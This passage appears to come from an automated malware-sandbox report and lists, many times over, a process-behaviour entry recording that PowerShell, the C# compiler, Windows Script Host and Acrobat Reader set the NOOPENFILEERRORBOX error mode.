          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
